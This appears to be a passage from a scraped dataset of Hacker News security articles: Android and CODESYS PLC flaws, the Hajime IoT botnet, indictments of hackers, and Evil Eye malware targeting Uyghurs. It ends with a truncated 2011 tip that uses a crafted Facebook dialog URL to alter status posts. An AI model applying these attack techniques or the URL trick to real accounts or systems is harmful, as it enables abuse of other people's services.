pre-installed on these devices at the time of manufacturing, they can only be fixed by installing a patch from the devices' distributors or carriers after receiving fixed driver packs from Qualcomm. ""This situation highlights the inherent risks in the Android security model,"" the researchers say. ""Critical security updates must pass through the entire supply chain before they can be made available to end users."" Three of the four vulnerabilities have already been fixed in Google's latest set of monthly security updates, and a patch for the remaining flaw will be rolled out in the upcoming September update. Since Qualcomm has already released the code, the phone manufacturers could be able to issue patches to the individual devices as soon as possible. Android Nexus devices are already patched via the over-the-air updates, but other smartphone models will need to wait until their lazy phone manufacturers integrate the fixes into their own custom Android ROMs. ",Malware 10 Critical Flaws Found in CODESYS Industrial Automation Software,https://thehackernews.com/2021/06/10-critical-flaws-found-in-codesys.html,"Cybersecurity researchers on Thursday disclosed as many as ten critical vulnerabilities impacting CODESYS automation software that could be exploited to achieve remote code execution on programmable logic controllers (PLCs). ""To exploit the vulnerabilities, an attacker does not need a username or password; having network access to the industrial controller is enough,"" researchers from Positive Technologies said. ""The main cause of the vulnerabilities is insufficient verification of input data, which may itself be caused by failure to comply with the secure development recommendations."" The Russian cybersecurity firm noted that it detected the vulnerabilities on a PLC offered by WAGO, which, among other automation technology companies such as Beckhoff, Kontron, Moeller, Festo, Mitsubishi, and HollySys, use CODESYS software for programming and configuring the controllers. CODESYS offers a development environment for programming controller applications for use in industrial control systems. The German software company credited Vyacheslav Moskvin, Denis Goryushev, Anton Dorfman, Ivan Kurnakov, and Sergey Fedonin of Positive Technologies and Yossi Reuven of SCADAfence for reporting the flaws. Six of the most severe flaws were identified in the CODESYS V2.3 web server component used by CODESYS WebVisu to visualize a human-machine interface (HMI) in a web browser. The vulnerabilities could potentially be leveraged by an adversary to send specially-crafted web server requests to trigger a denial-of-service condition, write or read arbitrary code to and from a control runtime system's memory, and even crash the CODESYS web server. All the six bugs have been rated 10 out of 10 on the CVSS scale — CVE-2021-30189 - Stack-based Buffer Overflow CVE-2021-30190 - Improper Access Control CVE-2021-30191 - Buffer Copy without Checking Size of Input CVE-2021-30192 - Improperly Implemented Security Check CVE-2021-30193 - Out-of-bounds Write CVE-2021-30194 - Out-of-bounds Read Separately, three other weaknesses (CVSS scores: 8.8) disclosed in the Control V2 runtime system could be abused to craft malicious requests that may result in a denial-of-service condition or being utilized for remote code execution. CVE-2021-30186 - Heap-based Buffer Overflow CVE-2021-30188 - Stack-based Buffer Overflow CVE-2021-30195 - Improper Input Validation Lastly, a flaw found in the CODESYS Control V2 Linux SysFile library (CVE-2021-30187, CVSS score: 5.3) could be used to call additional PLC functions, in turn allowing a bad actor to delete files and disrupt critical processes. ""An attacker with low skills would be able to exploit these vulnerabilities,"" CODESYS cautioned in its advisory, adding it found no known public exploits that specifically target them. ""Their exploitation can lead to remote command execution on PLC, which may disrupt technological processes and cause industrial accidents and economic losses,"" said Vladimir Nazarov, Head of ICS Security at Positive Technologies. ""The most notorious example of exploiting similar vulnerabilities is by using Stuxnet."" The disclosure of the CODESYS flaws comes close on the heels of similar issues that were addressed in Siemens SIMATIC S7-1200 and S7-1500 PLCs that could be exploited by attackers to remotely gain access to protected areas of the memory and achieve unrestricted and undetected code execution. ",Vulnerability "Hajime 'Vigilante Botnet' Growing Rapidly; Hijacks 300,000 IoT Devices Worldwide",https://thehackernews.com/2017/04/vigilante-hacker-iot-botnet_26.html,"Last week, we reported about a so-called 'vigilante hacker' who hacked into at least 10,000 vulnerable 'Internet of Things' devices, such as home routers and Internet-connected cameras, using a botnet malware in order to supposedly secure them. Now, that vigilante hacker has already trapped roughly 300,000 devices in an IoT botnet known as Hajime, according to a new report published Tuesday by Kaspersky Lab, and this number will rise with each day that passes by. The IoT botnet malware was emerged in October 2016, around the same time when the infamous Mirai botnet threatened the Internet last year with record-setting distributed denial-of-service (DDoS) attacks against the popular DNS provider Dyn. How the Hajime IoT Botnet Works Hajime botnet works much like Mirai by spreading itself via unsecured IoT devices that have open Telnet ports and uses default passwords and also uses the same list of username and password combinations that Mirai is programmed to use. However, the interesting part of Hajime botnet is that, unlike Mirai, once Hajime infects an IoT devices, it secures the devices by blocking access to four ports (23, 7547, 5555, and 5358) known to be the most widely used vectors for infecting IoT devices, making Mirai or other threats out of their bay. Hajime also uses a decentralized peer-to-peer network (instead of command-and-control server) to issue updates to infected devices, making it more difficult for ISPs and Internet providers to take down the botnet. One of the most interesting things about Hajime is the botnet also displays a cryptographically signed message every 10 minutes or so on infected device terminals, describing its creators as ""just a white hat, securing some systems."" Unlike Mirai and other IoT botnets, Hajime lacks DDoS capabilities and other hacking skills except for the propagation code that lets one infected IoT device search for other vulnerable devices and infects them. But What if…? What's not known is: What the Hajime Botnet is for? or Who is behind it? ""The most intriguing thing about Hajime is its purpose,"" says Kaspersky security researchers. ""While the botnet is getting bigger and bigger, partly due to new exploitation modules, its purpose remains unknown. We haven't seen it being used in any type of attack or malicious activity, adding that ""its real purpose remains unknown."" Also, the researchers believe that this might not happen, because Hajime botnet takes steps to hide its running processes and files on the file system, making the detection of infected systems more difficult. So far, the purpose behind building this botnet is not entirely clear, but all signs yet point to a possible white-hat hacker, who is on his/her mission to secure open and vulnerable systems over the Internet. However, the most concerning issue of all — Is there any guarantee that the Hajime author will not add attack capabilities to the worm to use the hijacked devices for malicious purposes? Maybe today the Hajime author is in the mission to secure the world, but tomorrow, when he would realize he could make money online by renting his/her botnet to others, he could be another Adam Mudd. Mudd, a 19-year-old teenager, has recently been sentenced to 2 years in prison for creating and running a DDoS-for-hire service called 'Titanium Stresser' that made more than 1.7 million victims of DDoS attacks since 2013. Secondly, What if the well-intentioned botnet is hijacked by some malicious actor? If this happens, the vigilant IoT botnet could be used for malicious purposes, such as conducting DDoS attacks against online sites and services, spreading malware, or instantly bricking the infected devices at one click. Radware researchers also believe that the flexible and extensible nature of the Hajime botnet can be used for malicious purposes, like those mentioned above and conducting real-time mass surveillance from Internet-connected webcams, according to a new threat advisory published Wednesday by Radware. Last but not the least: Do we seriously need some vigilante hackers to protect our devices and network? This solution could be temporary, trust me. For example, the latest Hajime botnet is nothing but a band-aid. Since Hajime has no persistence mechanism, as soon as the infected device is rebooted, it goes back to its previously unsecured state, with default passwords and the Telnet port open to the world. How to Protect your IoT devices? The only true solution is You — Instead of just sitting over there, doing nothing and waiting for some vigilante hackers to do miracles, you can protect your IoT devices in a way Hajime or any well-intentioned botnet can't do. So go and update the firmware of your devices, change their default passwords, put them behind a firewall, and if any device is by default vulnerable and cannot be updated, throw it and buy a new one. Just keep in mind: Once a single IoT of yours gets compromised, your whole network falls under risk of getting compromised and so all your devices which are connected to that network. ",Malware U.S. Announces Charges Against 2 Russian and 2 Iranian Hackers,https://thehackernews.com/2020/09/us-announces-charges-against-2-russian.html,"Immediately after revealing criminal charges against 5 Chinese and 2 Malaysian hackers, the United States government yesterday also made two separate announcements charging two Iranian and two Russian hackers and added them to the FBI's most-wanted list. The two Russian nationals—Danil Potekhin and Dmitrii Karasavidi—are accused of stealing $16.8 million worth of cryptocurrencies in a series of phishing attacks throughout 2017 and 2018. ""This tactic used a combination of phishing and spoofing to exploit Internet users' trust in known companies and organizations to fraudulently obtain their login credentials, including email addresses, password information, and other personal information,"" the DoJ said. In addition to the criminal charges, the U.S. Department of the Treasury has also sanctioned both Russian hackers, freezing all their assets under U.S. jurisdiction and banning them from doing business with Americans. ""Karasavidi laundered the proceeds of the attacks into an account in his name. He attempted to conceal the nature and source of the funds by transferring them in a layered and sophisticated manner through multiple accounts and multiple virtual currency blockchains. Ultimately, the stolen virtual currency was traced to Karasavidi's account, and millions of dollars in virtual currency and U.S. dollars was seized in a forfeiture action by the United States Secret Service,"" the U.S. Department of the Treasury explained. Whereas, both two Iranian nationals—Mehdi Farhadi and Hooman Heidarian—are allegedly involved in government-linked hacking operations and have stolen hundreds of terabytes of sensitive data from several targeted organizations. According to an indictment unsealed by the Justice Department, since 2013, Iranian hackers have targeted several American and foreign universities, think tanks, defense contractors, aerospace companies, foreign policy organizations, NGOs, and foreign governments. ""In some instances, the defendants' [Iranian] hacks were politically motivated or at the behest of Iran, including instances where they obtained information regarding dissidents, human rights activists, and opposition leaders,"" the indictment says. ""In other instances, the defendants sold the hacked data and information on the black market for private financial gain."" After selecting their victims using online reconnaissance and publicly available data, the hackers run vulnerability scanning tools and other means to assess computer networks remotely. ""The defendants gained and maintained unauthorized access to victim networks using various tools, including session hijacking, SQL injection, and malicious programs."" ""The defendants then used key-loggers and ""remote access Trojans"" to maintain access and monitor the actions of users of the victim networks."" All four hackers remain at large, likely in their respective countries, and have been charged with several counts of conspiracy to commit fraud, unauthorized access, wire fraud, identity theft, and related activity in connection with computers ",Cyber_Attack Chinese Hackers Used Facebook to Hack Uighur Muslims Living Abroad,https://thehackernews.com/2021/03/chinese-hackers-used-facebook-to-hack.html,"Facebook may be banned in China, but the company on Wednesday said it has disrupted a network of bad actors using its platform to target the Uyghur community and lure them into downloading malicious software that would allow surveillance of their devices. ""They targeted activists, journalists and dissidents predominantly among Uyghurs from Xinjiang in China primarily living abroad in Turkey, Kazakhstan, the United States, Syria, Australia, Canada and other countries,"" Facebook's Head of Cyber Espionage Investigations, Mike Dvilyanski, and Head of Security Policy, Nathaniel Gleicher, said. ""This group used various cyber espionage tactics to identify its targets and infect their devices with malware to enable surveillance."" The social media giant said the ""well-resourced and persistent operation"" aligned with a threat actor known as Evil Eye (or Earth Empusa), a China-based collective known for its history of espionage attacks against the Muslim minority in the nation at least since August 2019 via ""strategically compromised websites"" by exploiting iOS and Android devices as an attack surface to gain access to Gmail accounts. The disclosures come days after the European Union, U.K., U.S., and Canada jointly announced sanctions against several senior officials in China over human rights abuses against Uyghurs in the Chinese province of Xinjiang. Evil Eye is said to have resorted to a multifaceted approach to stay under and conceal its malicious intent by posing as journalists, students, human rights advocates, or members of the Uyghur community to build trust with targeted victims before drawing them into clicking on malicious links. Besides social engineering efforts, the collective leveraged a network of malware-infested websites, both legitimately compromised websites and lookalike domains for popular Uyghur and Turkish news sites, that were used as a watering hole to attract and selectively infect iPhone users based on certain technical criteria, including IP address, operating system, browser, country, and language settings. ""Some of these web pages contained malicious javascript code that resembled previously reported exploits, which installed iOS malware known as INSOMNIA on people's devices once they were compromised,"" the company noted. Insomnia comes with capabilities to exfiltrate data from a variety of iOS apps, such as contacts, location, and iMessage, as well as third-party messaging clients from Signal, WhatsApp, Telegram, Gmail, and Hangouts. Separately, Evil Eye also set up lookalike third-party Android app stores to publish trojanized Uyghur-themed applications such as a keyboard app, prayer app, and dictionary app, which served as a conduit to deploy two Android malware strains ActionSpy and PluginPhantom. Further investigation into the Android malware families linked the attack infrastructure to two Chinese companies Beijing Best United Technology Co., Ltd. (Best Lh) and Dalian 9Rush Technology Co., Ltd. (9Rush). ""These China-based firms are likely part of a sprawling network of vendors, with varying degrees of operational security,"" the researchers noted. In a series of countermeasures, the company said it blocked the malicious domains in question from being shared on its platform, disabled the offending accounts, and notified about 500 people who were targeted by the adversary. This is not the first time Facebook has outed technology firms that operate as a front for state-sponsored hacking activities. In December 2020, the social network formally linked OceanLotus to an information technology company called CyberOne Group located in Vietnam. ",Malware Tweaking Facebook Status with HTML button,https://thehackernews.com/2011/08/tweaking-facebook-status-with-html.html,"Tweaking Facebook Status with HTML button Have you thought that Facebook status updates that can be modified ? Yes we have a tweak for you : One is a Button Tag. One of our Hacker Friend ""Acizninja DeadcOde"" , admin of https://blog.cyber4rt.com sharing such cool tweaks with The Hacker News readers : Here's the concept: 1. Log in to your Facebook account. 2. Copy and paste the url code below into the Address Bar and press the Enter key: https://www.facebook.com/dialog/feed?app_id=209403259107231&redirect_uri=https%3A%2F%2Fwww..facebook.com&message&link=http%3A%2F%2Fwww.thehackernews.com%2F&name=